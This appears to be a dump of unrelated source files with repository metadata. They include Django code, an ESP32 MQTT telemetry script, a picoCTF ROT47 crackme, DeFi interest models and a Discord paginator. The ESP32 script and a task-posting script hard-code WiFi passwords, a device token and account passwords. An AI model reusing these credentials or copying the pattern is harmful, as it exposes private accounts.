        return self.get_query_params().get('ResourceOwnerAccount')
    def set_ResourceOwnerAccount(self, ResourceOwnerAccount): # String
        self.add_query_param('ResourceOwnerAccount', ResourceOwnerAccount)
    def get_TransitRouteTableAggregationScope(self): # String
        return self.get_query_params().get('TransitRouteTableAggregationScope')
    def set_TransitRouteTableAggregationScope(self, TransitRouteTableAggregationScope): # String
        self.add_query_param('TransitRouteTableAggregationScope', TransitRouteTableAggregationScope)
    def get_OwnerAccount(self): # String
        return self.get_query_params().get('OwnerAccount')
    def set_OwnerAccount(self, OwnerAccount): # String
        self.add_query_param('OwnerAccount', OwnerAccount)
    def get_OwnerId(self): # Long
        return self.get_query_params().get('OwnerId')
    def set_OwnerId(self, OwnerId): # Long
        self.add_query_param('OwnerId', OwnerId)
    def get_TransitRouteTableId(self): # String
        return self.get_query_params().get('TransitRouteTableId')
    def set_TransitRouteTableId(self, TransitRouteTableId): # String
        self.add_query_param('TransitRouteTableId', TransitRouteTableId)
    def get_TransitRouteTableAggregationCidr(self): # String
        return self.get_query_params().get('TransitRouteTableAggregationCidr')
    def set_TransitRouteTableAggregationCidr(self, TransitRouteTableAggregationCidr): # String
        self.add_query_param('TransitRouteTableAggregationCidr', TransitRouteTableAggregationCidr)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
82ffedb3852ee703562896da5953bc3f42e421c0 | 00dac6306847966655de49a2df06324353eb2055 | /blog/migrations/0010_post_slug.py | a9e1fe55083ccbc00db4f410b14332d940964f41 | [] | no_license | abdullahshaker10/Django_blog | 9807f3182f9419ad18b547c0f4e4a51c2e976284 | 57ed6267ad475409b1c5fd2719f8c3161153da2d | refs/heads/master | 2023-01-08T22:06:34.708601 | 2020-11-18T16:44:52 | 2020-11-18T16:44:52 | 313,996,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | # Generated by Django 3.0.3 on 2020-04-20 10:14
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the nullable 'slug' field to blog.Post, unique per publish date
    # (unique_for_date='post_publish').
    # NOTE: applied migrations should not be edited; create a new migration
    # for any further schema change.
    dependencies = [
        ('blog', '0009_post_status'),
    ]
    operations = [
        migrations.AddField(
            model_name='post',
            name='slug',
            field=models.SlugField(blank=True, max_length=250, null=True, unique_for_date='post_publish'),
        ),
    ]
| [
"abdullah.shaker2017@gmail.com"
] | abdullah.shaker2017@gmail.com |
a95e462de46aa655ccb705a450d4494d912669e4 | 0b3ff7bc2a5a82b999159bc252a5e00a7175741d | /ThingsBoard Sources/Data Encryption & Security/esp32ConnectFinalScript.py | 02b903a32cc19407d6dd1b1a6d6092fa91cf2cc6 | [] | no_license | AbanobMedhat/GP2020 | c77156b39f16665837535182a7b9fb05ba7ee28f | 54413893aba13592ff0823c96ee6b43566411c10 | refs/heads/master | 2023-02-14T13:57:57.945954 | 2020-08-24T01:31:06 | 2020-08-24T01:31:06 | 211,509,039 | 0 | 1 | null | 2021-01-06T09:11:31 | 2019-09-28T14:01:05 | QML | UTF-8 | Python | false | false | 1,607 | py | import machine
import json
import random
import sys
import time
import network
import ussl
from machine import Pin, PWM
from time import sleep
from umqtt.simple import MQTTClient
# WiFi connection information
# NOTE(review): credentials are committed in plain text; move them out of the
# source before publishing this script.
wifiSSID = 'Not_found'
wifiPassword = 'MOHAMED@AHMED?ESLAM!2006'
# turn off the WiFi Access Point
ap_if = network.WLAN(network.AP_IF)
ap_if.active(False)
# connect the ESP32 device to the WiFi network
wifi = network.WLAN(network.STA_IF)
wifi.active(True)
wifi.connect(wifiSSID, wifiPassword)
# wait until the device is connected to the WiFi network
MAX_ATTEMPTS = 20
attempt_count = 0
while not wifi.isconnected() and attempt_count < MAX_ATTEMPTS:
    attempt_count += 1
    time.sleep(1)
if not wifi.isconnected():
    # BUG FIX: the old check `attempt_count == MAX_ATTEMPTS` aborted even
    # when the connection succeeded on the final attempt; test the actual
    # link state instead.  (`sys` is imported at the top of the file.)
    print('could not connect to the WiFi network')
    sys.exit()
# Connect to Thingsboard server using port 8883 as secure port
def connect():
    """Publish one telemetry sample to ThingsBoard over MQTT with TLS.

    Connects to the broker with the device token as the MQTT username,
    publishes a single JSON payload to the telemetry topic, then sleeps.
    NOTE(review): broker address and device token are hard-coded; this
    function also requires ``sys`` to be imported at module level for the
    error path below.
    """
    # Device Token
    username="nSKYuguLUV2Iijjp6JWB"
    # Host IP
    broker= "18.191.196.152"
    # Required Destination of Data
    topic = "v1/devices/me/telemetry"
    Mqtt_CLIENT_ID = "ABSE"
    PASSWORD=""
    # SSL Certificate Path in Esp32
    ssl_params = {'cert':'mqttserver.pub.pem'}
    client = MQTTClient(client_id=Mqtt_CLIENT_ID, server=broker, port=8883, user=username,
                        password=PASSWORD, keepalive=10000, ssl=True, ssl_params=ssl_params)
    try:
        client.connect()
    except OSError:
        # Abort the script when the broker is unreachable.
        print('Connection failed')
        sys.exit()
    data = dict()
    # Data Sent
    data["TempData"] = 60
    data2=json.dumps(data)#convert it to json
    print('connection finished')
    client.publish(topic,data2)
    print("Done")
    time.sleep(5)
connect() | [
"abanobmedhat42@gmail.com"
] | abanobmedhat42@gmail.com |
f64b9082e64ef553e39e90db9d5ebb2f27e8d5dd | 33cea355339e424acfd3fe8180974166fc4639fd | /sorting/selectionsort.py | 3aa3e2a69bb8226e8223a5955d54c2c4db671dda | [
"MIT"
] | permissive | jrtechs/RandomScripts | e32d4a48b7ee1ffa6aa7b45b974d2d47ac04dd9b | f5ae872fa584de8c885eb4ad1673d152ae6be37b | refs/heads/master | 2021-06-26T18:42:33.811342 | 2020-08-09T20:41:29 | 2020-08-09T20:41:29 | 151,647,447 | 4 | 30 | MIT | 2020-10-02T20:06:39 | 2018-10-04T23:18:31 | Jupyter Notebook | UTF-8 | Python | false | false | 278 | py | #selection sorting
import sys
# Selection sort: repeatedly move the smallest remaining element to the front.
A = [6, 2, 1, 3, 4]
for i in range(len(A)):
    # Index of the smallest element in the unsorted tail (first occurrence
    # wins, exactly like the original strict ">" comparison).
    smallest = min(range(i, len(A)), key=A.__getitem__)
    A[i], A[smallest] = A[smallest], A[i]
print("Sorted array")
for value in A:
    print("%d" % value)
| [
"noreply@github.com"
] | jrtechs.noreply@github.com |
f9fb7a7b37c9fe9aedc4c412916e84f333bff2cb | 4828d5b3954183728b6267be39732fe3587d20b7 | /fxm/strategy/admin.py | 6e34a1b25003fbf094365306bae116fb32e07f62 | [
"Apache-2.0"
] | permissive | panyuan5056/fx | bd9a2cd90ff0825ad4340414c8131e3737ba0e60 | 24ca8dd57de7534e4d20cfbf2890607a1741dc70 | refs/heads/main | 2023-07-20T07:06:38.941708 | 2021-08-28T04:32:11 | 2021-08-28T04:32:11 | 400,700,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | try:
import simplejson as json
except Exception as e:
import json
from datetime import datetime as dt
import requests
from django.contrib import admin
from django.conf import settings
from django import forms
from .models import Strategy
#from flyadmin.widget.forms import SelectBoxWidget, TimelineWidget, EditorWidget, DateTimeWidget, UploadImagesWidget, InputNumberWidget, UploadFileWidget, StepsWidget, StepsNormalWidget
class StrategyAdminForm(forms.ModelForm):
    # ModelForm backing StrategyAdmin: all Strategy fields with Django's
    # default widgets (the widgets dict is intentionally left empty).
    class Meta:
        model = Strategy
        widgets = {}
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        # No extra setup yet; kept as a hook for future widget/queryset tweaks.
        super(StrategyAdminForm, self).__init__(*args, **kwargs)
class StrategyAdmin(admin.ModelAdmin):
    # Admin configuration for Strategy: custom form, list columns and
    # name-based search.
    form = StrategyAdminForm
    list_display = ('name', 'class1', 'class2', 'class3', 'dept', 'category', 'forward', 'update_time')
    search_fields = ('name', )
    def get_form(self, request, obj=None, **kwargs):
        # Currently a pass-through; kept as a hook for per-request form tweaks.
        form = super(StrategyAdmin, self).get_form(request, obj, **kwargs)
        return form
    def get_queryset(self, request):
        # filter() with no arguments returns the full queryset unchanged.
        qs = super(StrategyAdmin, self).get_queryset(request)
        return qs.filter()
admin.site.register(Strategy, StrategyAdmin)
| [
"panyy@idss-cn.com"
] | panyy@idss-cn.com |
5788896282ea8056f79d78e57224a9bef3acac4f | 6ef84e7122122db3c3586e9cf718d8383b38ce23 | /picoCTF2021/crackme-py/crackme.py | e96a1556f9e141d53716c53de091c9c65e743fd3 | [] | no_license | greytabby/CTF | 5612c5d84f12b0ea5d2309087d0753ece1cd033f | 59b7b2de75fdcb68494e26e7b08e5c8b79142387 | refs/heads/master | 2021-06-08T12:02:57.410722 | 2021-05-30T11:42:44 | 2021-05-30T11:42:44 | 155,959,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | # Hiding this really important number in an obscure piece of code is brilliant!
# AND it's encrypted!
# We want our biggest client to know his information is safe with us.
bezos_cc_secret = "A:4@r%uL`M-^M0c0AbcM-MFE055a4ce`eN"
# Reference alphabet: printable ASCII from '!' (33) to '~' (126), 94 symbols.
alphabet = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"+ \
           "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
def decode_secret(secret):
    """ROT47 decode
    NOTE: encode and decode are the same operation in the ROT cipher family.

    Prints the decoded text and also returns it.  The original computed the
    decoded string and then discarded it, which made the function unusable
    programmatically; returning the value is backward compatible with callers
    that ignored the (previously None) result.
    """
    # Encryption key
    rotate_const = 47
    # Storage for decoded secret
    decoded = ""
    # decode loop
    for c in secret:
        index = alphabet.find(c)
        original_index = (index + rotate_const) % len(alphabet)
        decoded = decoded + alphabet[original_index]
    print(decoded)
    return decoded
def choose_greatest():
    """Echo the largest of the two numbers given by the user to the program

    BUG FIX: the inputs were previously compared as *strings*, so the result
    was lexicographic (e.g. "9" ranked above "10").  The values are now
    compared numerically; non-numeric input raises ValueError explicitly,
    which the original docstring already flagged as missing error handling.
    """
    user_value_1 = input("What's your first number? ")
    user_value_2 = input("What's your second number? ")
    greatest_value = user_value_1 # need a value to return if 1 & 2 are equal
    if float(user_value_1) > float(user_value_2):
        greatest_value = user_value_1
    elif float(user_value_1) < float(user_value_2):
        greatest_value = user_value_2
    print( "The number with largest positive magnitude is "
           + str(greatest_value) )
choose_greatest()
| [
"munchkin.coco@gmail.com"
] | munchkin.coco@gmail.com |
ecbaded27dd99a47aef58b83106df29e1c158f97 | da1001157b7458f86f101384a68ac33876d1c3ab | /break_time.py | 884dbc2e9dc8df413db775fa1898a954eb0f6b4d | [] | no_license | drbree82/Udacity | 374f55605029d02b3dc3375af8ea5ed2230f3542 | 89cce7b677dc80cc37394a04e36870dd84cf36f9 | refs/heads/master | 2020-04-04T16:18:28.451209 | 2015-02-07T23:19:49 | 2015-02-07T23:19:49 | 30,474,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | import webbrowser
import time
# Open the break video three times, pausing two seconds before each launch.
for _ in range(3):
    time.sleep(2)
    webbrowser.open("https://www.youtube.com/watch?v=HTN6Du3MCgI")
| [
"drbree82@gmail.com"
] | drbree82@gmail.com |
f8c69218110569d35951f0af4f65eca22deaa0cd | 89e2bdaece138d16bd6c661318561b8644a09999 | /webapplication/opencv/opencv.py | 90a8bab4187adbf8fa868f7b3dffc1c1b52f7ee3 | [] | no_license | hafugg110/fir- | 5c91c6a62dbe46cbc2a1ed0b2c9b756a3664db66 | c68ded0f3950a31f9a866322d1d4b3a74efd2673 | refs/heads/master | 2023-04-25T02:11:12.669020 | 2021-05-12T02:47:33 | 2021-05-12T02:47:33 | 345,895,732 | 0 | 0 | null | 2021-03-10T06:46:57 | 2021-03-09T05:40:12 | null | UTF-8 | Python | false | false | 270 | py | from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
    # Show the form on GET.
    # BUG FIX: 'index' was defined twice and '/' registered twice; Flask
    # raises "View function mapping is overwriting an existing endpoint
    # function: index" at import time, so the app never started.  The two
    # identical GET handlers are merged into this one.
    return 'Hello, world.'
@app.route('/', methods=['POST'])
def process():
# 處理圖片
return 'Process' | [
"haha110099@gmail.com"
] | haha110099@gmail.com |
544a76304660251df0418c0ad36bbc153dd44bdd | 6434944419969a10bffe29fbc51b3d3213acdf39 | /data_structures_homeworks/percolation/run_stats.py | 613c71171de94e52ea9e39e19727b20fad696ccb | [] | no_license | ngozinwogwugwu/exercises | bbd76e0bbb84a96074b1e9c9ae659d6c470b33bf | a8d96de3c8ddd27566d65e7ce168b74ff989da6a | refs/heads/master | 2021-03-30T10:41:15.043410 | 2020-06-03T15:53:41 | 2020-06-03T15:53:41 | 248,045,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | from percolation_stats import PercolationStats
# Run percolation statistics on a 20x20 grid with 500 trials and print the
# sample mean three times.
ps = PercolationStats(20, 500)
# NOTE(review): it is not visible from here whether mean() re-samples on each
# call or returns a cached value -- confirm against PercolationStats.
print('measurement 1: ' + str(ps.mean()))
print('measurement 2: ' + str(ps.mean()))
print('measurement 3: ' + str(ps.mean()))
| [
"ngozi.n.nwogwugwu@gmail.com"
] | ngozi.n.nwogwugwu@gmail.com |
cfaea0af904f507dc6e398516b1f31496c700364 | 8f9a05bf34dc5a1b6d78149c621338169e98e187 | /Social promotion/test_1.py | 9961026cc8787766a9679c04da4ccb0c0511596e | [] | no_license | susu1988/showroom | bf6ae99d561da425a24b73ad544e22d0723e0a42 | 81e867fb09a3c011274420fd051bd80ce765965c | refs/heads/master | 2021-03-05T15:18:28.016176 | 2019-08-13T12:15:13 | 2019-08-13T12:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,102 | py | # -*- coding: utf-8 -*-
# @Author : Zhy
import base64
import requests
from setting import *
import json
# task_2 = '{"isOperate":0,"act":"taskOperate","taskList":[{"isOpen":0,"endDate":"","contentId":"8ca9857fc47346c79191f19f6fd56c09","headUrl":"","inputTime":{"date":1,"hours":14,"seconds":58,"month":3,"timezoneOffset":-480,"year":119,"minutes":57,"time":1554101878000,"day":1},"channelType":3,"todayCount":0,"groupKey":"","limitKey":"","orgId":"rd","imageUrl":"","nickname":"","inputAcc":"rd001","groupClass":"","id":"9a114875e2dd46b2805dbc66f56d9f0e","text":"","orderKey":"","taskAcc":"aaas","updateAcc":"","updateTime":null,"focusNum":0,"ownerAcc":"rd001","generalizeType":1,"isDel":0,"startDate":""},{"isOpen":0,"endDate":"","contentId":"196c8fabe2d54d63a3c05a1265fd3e4a","headUrl":"","inputTime":{"date":2,"hours":11,"seconds":8,"month":3,"timezoneOffset":-480,"year":119,"minutes":21,"time":1554175268000,"day":2},"channelType":3,"todayCount":0,"groupKey":"","limitKey":"","orgId":"rd","imageUrl":"","nickname":"","inputAcc":"rd001","groupClass":"","id":"e2a0c7b9428f43f6888627a919d61f07","text":"","orderKey":"","taskAcc":"13018956681","updateAcc":"","updateTime":null,"focusNum":0,"ownerAcc":"rd001","generalizeType":1,"isDel":0,"startDate":""}],"orgId":"rd","boxId":"2000"}'
task_2={'startDate': '', 'channelType': 3, 'accountId': 'ab96ac5d24eb41babcf38b770d794d31', 'updateAcc': '', 'imageUrl': '', 'focusNum': 0, 'endDate': '', 'password': 'zhy200817436', 'contentId': 'aaba011b9d9f43c297fd1dd6b5153673', 'id': '1689ffc7f7c14acabb58d1328acf00f6', 'orgId': 'qfzn', 'todayCount': 0, 'ownerAcc': 'qfzn002', 'groupClass': '', 'isDel': 0, 'headUrl': '', 'inputAcc': 'qfzn002', 'text': '哈哈哈', 'limitKey': '', 'updateTime': None, 'nickname': '', 'taskAcc': '13018956681', 'inputTime': {'time': 1556102409000, 'minutes': 40, 'seconds': 9, 'hours': 18, 'month': 3, 'year': 119, 'timezoneOffset': -480, 'day': 3, 'date': 24}, 'isOpen': 0, 'groupKey': '', 'orderKey': '', 'generalizeType': 1}
task_xqgz={'orgId': 'qfzn', 'boxId': '3001', 'taskList': [{'startDate': '', 'channelType': 3, 'accountId': '', 'updateAcc': '', 'imageUrl': '', 'focusNum': 0, 'endDate': '', 'password': '', 'contentId': 'aaba011b9d9f43c297fd1dd6b5153673', 'id': '1689ffc7f7c14acabb58d1328acf00f6', 'orgId': 'qfzn', 'todayCount': 0, 'ownerAcc': 'qfzn002', 'groupClass': '', 'isDel': 0, 'headUrl': '', 'inputAcc': 'qfzn002', 'text': '哈哈哈', 'limitKey': '', 'updateTime': None, 'nickname': '', 'taskAcc': '13018956681', 'inputTime': {'time': 1556102409000, 'minutes': 40, 'seconds': 9, 'hours': 18, 'month': 3, 'year': 119, 'timezoneOffset': -480, 'day': 3, 'date': 24}, 'isOpen': 0, 'groupKey': '', 'orderKey': '', 'generalizeType': 1}], 'act': 'taskOperate', 'isOperate': 0}
task_login = {"act": "channelLogin","id": "gradfffgWQQdfdfsgvbtdf","orgId": "rd","channelAcc": "13018956681","password": "kaopza743","type": 2,"ownerAcc": "333333"}
task_xqfl={'orgId': 'qfzn', 'boxId': '3000', 'taskList': [{'startDate': '', 'channelType': 3, 'accountId': 'ab96ac5d24eb41babcf38b770d794d31', 'updateAcc': '', 'imageUrl': '', 'focusNum': 0, 'endDate': '', 'password': 'zhy200817436', 'contentId': 'aaba011b9d9f43c297fd1dd6b5153673', 'id': '9b4790bc332940d6997cfec2438a93b3', 'orgId': 'qfzn', 'todayCount': 0, 'ownerAcc': 'qfzn002', 'groupClass': '3063,2003', 'isDel': 0, 'headUrl': '', 'inputAcc': 'qfzn002', 'text': '哈哈哈', 'limitKey': '', 'updateTime': None, 'nickname': '', 'taskAcc': '13018956681', 'inputTime': {'time': 1556158401000, 'minutes': 13, 'seconds': 21, 'hours': 10, 'month': 3, 'year': 119, 'timezoneOffset': -480, 'day': 4, 'date': 25}, 'isOpen': 0, 'groupKey': '', 'orderKey': '', 'generalizeType': 0}], 'act': 'taskOperate', 'isOperate': 0}
url = 'http://192.168.1.168:8866' # main service endpoint
url_1 = URL_CODE_TABLE # code-table endpoint
# Serialize the selected task payload, base64-wrap it and POST it to the
# main service; the response is base64-encoded text decoded the same way.
task_2=json.dumps(task_xqfl)
res = task_2.encode('utf-8')
# res = bytes('{}'.format(task_2), 'utf-8')
res = base64.b64encode(res)
b = requests.post(url=url, data=res).text
b = base64.b64decode(b)
b = b.decode('utf-8', errors='ignore')
print(b)
| [
"1260132105@qq.com"
] | 1260132105@qq.com |
045807bd2d431357637794e312e8b28745f0fb7d | 964e658a34ddc88625897df950ed904b36815888 | /mk_conf.py | 6ef0dae7f69fef268d06eb1dccd238d0d148bc67 | [] | no_license | pashorg/MikroTik_config | 4739e2b8b4fe2380ca43824980c39383ecb857c8 | f17cf6fb20c431bae6c3d092cb47ade1ea0c1691 | refs/heads/master | 2021-01-23T04:40:03.786419 | 2017-03-26T13:38:19 | 2017-03-26T13:38:19 | 86,234,878 | 0 | 0 | null | 2017-03-26T13:35:40 | 2017-03-26T13:32:48 | null | UTF-8 | Python | false | false | 1,572 | py | # -*- coding: utf-8 -*-
import json #Used to parse json files
from optparse import OptionParser #Used to parse input arguments
import conf_maker #Class file
#Input arguments configuration and parser
# NOTE: this is a Python 2 script (see the `print command` statement below);
# it will not run unmodified under Python 3.
parser = OptionParser()
parser.add_option('-m', '--main-json', dest='main_json_file', help='Main json file name', metavar='FILE', default=0)
parser.add_option('-s', '--serv-json', dest='service_json_file', help='Tarification json file name', metavar='FILE', default=0)
parser.add_option('-o', '--out-file', dest='output_file', help='Output file name', metavar='FILE', default=0)
(options, args) = parser.parse_args()
#Open json files. If no file set - raise error
# NOTE(review): the opened files are never closed; acceptable for a
# short-lived script but worth wrapping in `with` blocks on a rewrite.
if options.main_json_file:
    data_import_file = open(options.main_json_file, 'r')
    data = json.load(data_import_file)
else: raise RuntimeError('Main json file required')
if options.service_json_file:
    service_import_file = open(options.service_json_file, 'r')
    service_data = json.load(service_import_file)
else: raise RuntimeError('Tarification json file required')
#Set output file if one was specified
data_export_file = ''
if options.output_file: data_export_file = open(options.output_file,'w') #open output file if needed
#Load class
config_maker = conf_maker.conf_maker(data['report'], service_data['report'])
full_conf = config_maker.get_all()
#Print to output file if one is set
if options.output_file:
    for command in full_conf: data_export_file.write(command)
#Print to command line otherwise
else:
    for command in full_conf: print command
"noreply@github.com"
] | pashorg.noreply@github.com |
ade9d719d5e6caff26a5f19e50b6052ec56573fd | d40e5a973d7dd6c5f346f4e1cc531572e868175f | /src/models.py | 270e35bd0fe7119a21fd792f0037ed5bde14dc49 | [
"MIT"
] | permissive | AndyXIN/farm-calc | 3f7abc8f160d8aa03ff8604ff41313ad66a8ff4b | b1769232d4577fde408ee43f7197299e61425dca | refs/heads/main | 2023-07-07T03:56:23.967627 | 2021-08-10T04:31:28 | 2021-08-10T04:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,834 | py | from typing import Callable, Dict, List
class Interest:
    """Base investment figures.

    Holds the invested capital plus the Annual Percentage Rate expressed both
    as a yearly fraction and as a per-day rate.
    """

    def __init__(self, capital: float, apr: float) -> None:
        # ``apr`` arrives as a percentage (e.g. 36.5) and is stored as a
        # fraction; the daily rate simply divides the year into 365 days.
        self.cap = capital
        self.apr = apr / 100
        self.daily = self.apr / 365
class Simple(Interest):
    """Simple-interest view of an investment.

    Extends Interest with per-period rates (a 30-day month, an hour) and the
    income each period yields on the invested capital.
    """

    def __init__(self, capital: float, apr: float) -> None:
        Interest.__init__(self, capital, apr)
        # Derived rates and the matching incomes, grouped per period.
        self.monthly: float = self.daily * 30
        self.hourly: float = self.daily / 24
        self.annual_income: float = self.cap * self.apr
        self.monthly_income: float = self.cap * self.monthly
        self.daily_income: float = self.cap * self.daily
        self.hourly_income: float = self.cap * self.hourly
class Compound(Interest):
    """
    Compound interest includes:
    - List of possible Periods for a given number of days and their performance.
    - Top 3 Periods with the best performance and the recommended one.
    - Explanation of relevant indicators (dif)
    """
    def __init__(self, cap: float, apr: float, gas: float, days: int) -> None:
        Interest.__init__(self, cap, apr)
        self.periods: List[Period] = []
        self.best: List[Period] = []
        self.recom: Period
        self._calc_periods(gas, days)
    def _comp_cycles(self, cap: float, days: int) -> None:
        # Do Compound every x number of days: one Period per divisor x of
        # `days`, i.e. compound x times with a cycle length of days/x days.
        for x in range(1, days - 1):
            if days % x == 0:
                pd = Period(cap=cap, days=int(days / x), cycles=x)
                self.periods.append(pd)
    def _calc_periods(self, gas: float, days: int):
        # Simple interest accrued over the whole N days, split per cycle below.
        simple_int: float = days * self.daily
        self._comp_cycles(self.cap, days)
        # Difference between the current and the previous period for profit
        # and gas (the first period keeps zero differences).
        prev_profit: float = 0
        prev_gas: float = 0
        for pd in self.periods:
            pd.set_gas(gas)
            pd.set_interest(simple_int / pd.cycles)
            if prev_profit != 0:
                pd.dif_profit = pd.profit - prev_profit
                pd.dif_gas = pd.spent_gas - prev_gas
            else:
                pd.dif_profit = prev_profit
                pd.dif_gas = prev_gas
            prev_profit = pd.profit
            prev_gas = pd.spent_gas
        # Filter out the losing periods (extra profit must beat extra gas).
        cond: Callable[[Period], bool] = lambda p: p.dif_profit > p.dif_gas
        self.best = list(filter(cond, self.periods))
        # Keep the three best-performing frequencies; recommend the one with
        # the longest cycle length among them.
        if len(self.best) > 0:
            self.best = self.best[-3:]
            self.recom = max(self.best, key=lambda x: x.days)
class Period:
    """One candidate compounding frequency within the Compound analysis.

    Tracks how many days elapse between compounds, how many cycles run,
    the gas spent, the yield/profit/ROI, and the deltas (dif_*) versus the
    previous candidate frequency.
    """
    def __init__(self, cap: float, days: int, cycles: int):
        self.cap = cap
        self.days = days
        self.cycles = cycles
        # The fields below are populated later via set_gas()/set_interest()
        # and by the Compound owner (dif_*).
        self.spent_gas: float
        self._yield: float
        self.profit: float
        self.roi: float
        self.dif_profit: float
        self.dif_gas: float
    def set_gas(self, gas: float) -> None:
        # One gas fee is paid per compounding cycle.
        self.spent_gas = gas * self.cycles
    def set_interest(self, interest: float) -> None:
        # Grow the capital by `interest` each cycle, then strip the principal
        # to get the raw yield; profit nets out the gas fees.
        grown = self.cap * (1 + interest) ** self.cycles
        self._yield = grown - self.cap
        self.profit = self._yield - self.spent_gas
        self.roi = 100 * (self.profit / self.cap)
if __name__ == "__main__":
    # This module only defines models; running it directly does nothing useful.
    print("This is not main!")
| [
"g298luis@gmail.com"
] | g298luis@gmail.com |
da446623dd165e79d5deb3c0f0acefeb406914f2 | cceaf304f65a46bf4725b7dc8d0de2b3584d763d | /utils/pagination.py | f4262661c19c278deef6ecf1a4b9cf65450956db | [
"MIT"
] | permissive | davisschenk/Unnamed-Bot | 7b7c8670300e1a55c0c335a559812fc1f666015b | 8e05d5a79dfab768574efd4e9061e2d7b22ae9e5 | refs/heads/master | 2022-06-04T11:42:51.391474 | 2020-05-01T05:33:48 | 2020-05-01T05:33:48 | 194,289,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,936 | py | # Code from https://github.com/Rapptz/RoboDanny/blob/rewrite/cogs/utils/paginator.py
# Used under MIT licence
import asyncio
import discord
from discord.ext.commands import Paginator as CommandPaginator
from utils.embeds import CustomEmbeds
import data.custom_emotes as emotes
class CannotPaginate(Exception):
    """Raised when the bot lacks the permissions needed for a pagination session."""
class Pages:
    """Implements a paginator that queries the user for the
    pagination interface.
    Pages are 1-index based, not 0-index based.
    If the user does not reply within 2 minutes then the pagination
    interface exits automatically.
    Parameters
    ------------
    ctx: Context
        The context of the command.
    entries: List[str]
        A list of entries to paginate.
    per_page: int
        How many entries show up per page.
    show_entry_count: bool
        Whether to show an entry count in the footer.
    Attributes
    -----------
    embed: discord.Embed
        The embed object that is being used to send pagination info.
        Feel free to modify this externally. Only the description,
        footer fields, and colour are internally modified.
    permissions: discord.Permissions
        Our permissions for the channel.
    """
    def __init__(self, ctx, *, entries, per_page=12, show_entry_count=True, **kwargs):
        self.bot = ctx.bot
        self.entries = entries
        self.message = ctx.message
        self.channel = ctx.channel
        self.author = ctx.author
        self.per_page = per_page
        # Number of pages, rounding up for a final partial page.
        pages, left_over = divmod(len(self.entries), self.per_page)
        if left_over:
            pages += 1
        self.maximum_pages = pages
        self.embed = CustomEmbeds.info(**kwargs)
        # Only run the interactive reaction session when there is >1 page.
        self.paginating = len(entries) > per_page
        self.show_entry_count = show_entry_count
        # (emoji, coroutine) pairs. NOTE: the handlers' docstrings are shown
        # to the user by show_help(), so they are user-facing text.
        self.reaction_emojis = [
            (emotes.skip_backwards, self.first_page),
            (emotes.backwards, self.previous_page),
            (emotes.forwards, self.next_page),
            (emotes.skip_forwards, self.last_page),
            (emotes.pound_sign, self.numbered_page),
            (emotes.stop, self.stop_pages),
            (emotes.info, self.show_help),
        ]
        # In DMs there is no guild member to check permissions for.
        if ctx.guild is not None:
            self.permissions = self.channel.permissions_for(ctx.guild.me)
        else:
            self.permissions = self.channel.permissions_for(ctx.bot.user)
        if not self.permissions.embed_links:
            raise CannotPaginate('Bot does not have embed links permission.')
        if not self.permissions.send_messages:
            raise CannotPaginate('Bot cannot send messages.')
        if self.paginating:
            # verify we can actually use the pagination session
            if not self.permissions.add_reactions:
                raise CannotPaginate('Bot does not have add reactions permission.')
            if not self.permissions.read_message_history:
                raise CannotPaginate('Bot does not have Read Message History permission.')
    def get_page(self, page):
        """Return the slice of entries belonging to the 1-indexed *page*."""
        base = (page - 1) * self.per_page
        return self.entries[base:base + self.per_page]
    def get_content(self, entries, page, *, first=False):
        """Plain-text message content for a page; None means embed-only."""
        return None
    def get_embed(self, entries, page, *, first=False):
        """Return self.embed after filling it in for this page."""
        self.prepare_embed(entries, page, first=first)
        return self.embed
    def prepare_embed(self, entries, page, *, first=False):
        """Write the numbered entries (and footer) into self.embed."""
        p = []
        for index, entry in enumerate(entries, 1 + ((page - 1) * self.per_page)):
            p.append(f'{index}. {entry}')
        if self.maximum_pages > 1:
            if self.show_entry_count:
                text = f'Page {page}/{self.maximum_pages} ({len(self.entries)} entries)'
            else:
                text = f'Page {page}/{self.maximum_pages}'
            self.embed.set_footer(text=text)
        if self.paginating and first:
            p.append('')
            p.append(f'Confused? React with {emotes.info} for more info.')
        self.embed.description = '\n'.join(p)
    async def show_page(self, page, *, first=False):
        # Render *page*; on the first call also send the message and attach
        # the navigation reactions, otherwise edit the existing message.
        self.current_page = page
        entries = self.get_page(page)
        content = self.get_content(entries, page, first=first)
        embed = self.get_embed(entries, page, first=first)
        if not self.paginating:
            return await self.channel.send(content=content, embed=embed)
        if not first:
            await self.message.edit(content=content, embed=embed)
            return
        self.message = await self.channel.send(content=content, embed=embed)
        for (reaction, _) in self.reaction_emojis:
            if self.maximum_pages == 2 and reaction in (emotes.skip_forwards, emotes.skip_backwards):
                # no |<< or >>| buttons if we only have two pages
                # we can't forbid it if someone ends up using it but remove
                # it from the default set
                continue
            await self.message.add_reaction(reaction)
    async def checked_show_page(self, page):
        # Ignore out-of-range page requests instead of raising.
        if page != 0 and page <= self.maximum_pages:
            await self.show_page(page)
    async def first_page(self):
        """goes to the first page"""
        await self.show_page(1)
    async def last_page(self):
        """goes to the last page"""
        await self.show_page(self.maximum_pages)
    async def next_page(self):
        """goes to the next page"""
        await self.checked_show_page(self.current_page + 1)
    async def previous_page(self):
        """goes to the previous page"""
        await self.checked_show_page(self.current_page - 1)
    async def show_current_page(self):
        # Re-render the page we are on (used to leave the help screen).
        if self.paginating:
            await self.show_page(self.current_page)
    async def numbered_page(self):
        """lets you type a page number to go to"""
        to_delete = []
        to_delete.append(await self.channel.send('What page do you want to go to?'))
        def message_check(m):
            # Only accept an all-digit reply from the invoker in this channel.
            return m.author == self.author and \
                   self.channel == m.channel and \
                   m.content.isdigit()
        try:
            msg = await self.bot.wait_for('message', check=message_check, timeout=30.0)
        except asyncio.TimeoutError:
